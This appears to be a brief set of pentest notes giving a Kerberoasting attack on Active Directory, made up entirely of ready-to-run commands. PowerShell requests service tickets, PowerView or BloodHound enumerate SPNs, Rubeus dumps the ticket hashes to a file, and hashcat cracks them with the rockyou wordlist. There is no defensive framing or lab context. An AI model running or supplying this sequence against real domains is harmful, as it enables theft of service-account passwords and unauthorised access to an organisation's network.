Using Rubeus

• Method 1

Type 1) & 2) in powershell or cmd , this will generate requested service ticket

1) Add-Type -AssemblyName System.IdentityModel
2)
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “<SPN>”

to get SPN, go to bloodhound>select service account>node info>spn
Or with 
PowerView  with the command Get-NetUser -username "svc_tgs" -SPN | select samaccountname, primarygroupid, serviceprincipalname

• .\Rubeus.exe kerberoast /outfile:hashes.kerberoast

• sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force